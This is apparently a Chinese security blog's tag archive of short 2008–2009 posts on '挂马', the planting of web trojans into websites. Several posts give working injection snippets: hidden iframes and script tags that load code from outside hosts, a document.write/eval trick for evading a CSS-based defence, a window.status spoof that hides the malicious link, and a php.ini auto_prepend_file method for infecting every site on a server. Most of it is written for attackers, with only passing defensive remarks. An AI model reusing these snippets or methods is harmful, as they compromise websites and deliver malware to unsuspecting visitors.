存档

文章标签 ‘挂马’

挂马也小心

2009年4月27日 2 条评论

朋友的网被挂马,看了一下,是这样的:

1
2
3
4
5
6
if(document.location.href.indexOf("gov")>=0)
{} else {document.write("
<div style="display: none&amp;amp;amp;">")
document.write("")
document.write("</div>
")}

这年头挂马也知道防范呀!

分类: 网络安全 标签:

PHP.ini挂马方式

2009年3月12日 没有评论

  发现转载只复制内容,转载请声明来源!!
  本来这两天研究PHPIDS,使用文件是:当要在防止页面攻击时,可在页面的头部include防攻击文件,就像通用防注入文件。我们可以用三种情况来办到:
1、在每个文件内引用。这样的文件是可以,不过如果一个网站内有几百个文件的话就不方便了。
2、在共同包含文件内引用一下,比如 config.inc.php。这是一个好办法,也是目前市场上比较流行的做法。
3、在php.ini中引用。在配置文件内引用的话,将影响到所以的网站,包含所有页面,这就像当年流行的一些免费空间商,当你免费开通一个ftp空间,上传网站以后,空间内会出现广告一样。不知道是不是这种方法,但是目的是一样的。这样做的好处是:如果是一个公司或者是一个企业内部网站的话,即安全,维护也方便。

前两种方法大家都清楚,第三种就是在php.ini中,找到此节:

; Automatically add files before or after any PHP document.<br />;auto_prepend_file = "phpids.php"<br />;auto_append_file = "alert.php"

默认是空,请添加所包含的文件。同时找到:

; UNIX: "/path1:/path2"<br />;include_path = ".:/php/includes"<br />;<br />; Windows: "&#92;path1;&#92;path2"<br />include_path = ".;F:&#92;PHPnow&#92;htdocs"

因为我的是win环境,所以开启了windows选项,包含路径可自由修改。

同时,这样的功能也为我们攻击也造成了方便,比如挂马。现在“市场”上也有很多的挂马技巧,就不多说了。我们可以利用auto_prepend_file选项,来批量挂马了,可以将整个服务器上的网站挂上,优点为:不影响速度、不修改文件、方法新颖。 缺点为:必须对php.ini有写权限。

分类: 网络安全 标签: ,

挂马的一个小技巧

2008年5月11日 没有评论

from:%5c

挂马时用的都是

<iframe src=http://www.XXX.com/mm.htm width=0 height=0></iframe>

这样的源码,但是浏览被挂的时候,状态栏会显示挂马的链接,在mm.htm或被挂的页面加上一句

<body onload=window.status="被挂站的网址">

可能会好一点点儿。

分类: 网络安全 标签:

超短挂马代码大全

2008年4月29日 1 条评论

来源:cnshark.net
原创超短JS挂马
挂马的代码:
<script src=http://a1l.cn></script>
index.htm内容:
document.write("<div style='display:none'>")
document.write("<iframe src=http://a1l.cn/ani.htm></iframe>")
document.write("<iframe src="http://a1l.cn/1.htm" width="0" height="0"

frameborder="0"></iframe>")
document.write("</div>")

一:框架挂马                   阅读全文…

分类: 网络安全 标签:

突破“二行代码解决全部网页木马”挂马

2008年4月12日 没有评论

前两篇提到了linr@cncert.net写的那利用CSS来防范网页挂马,那么我们是不是利用这种方法就可以挂不成马了呢??
刚在“vbs小铺”看到了,想突破这种防范挂马的方式,我们可以利用这样写网马:
代码:

<script>eval(document.write("<script src=http://192.168.8.100/1.js><&#92;/script>"))</script>

就是说不把src=http放在<script>标签里。

分类: 网络安全 标签:

404挂马 + 杂谈

2008年3月19日 没有评论

来源:六翼刺猬的某某刺猬窝
http://www.688ip.com/dae5g45
今天在卡饭看到的被说是挂马的东西,想要获取源码但返回了404;

细心一看,的确被挂马了,从服务器那里返回的404信息里面包含了挂马代码:

<script src="http://ad.shitip.com/file/da.js"></script>

貌似最近第三次看到了;

P.S. 某服务器返回的404信息是可以自定义的,如Google的那些:http://www.google.com/2.htm

细想一下,这样是一个不错的挂马选择:

先把挂马代码插入到要返回的404信息里面; 阅读全文…

分类: 网络安全 标签: ,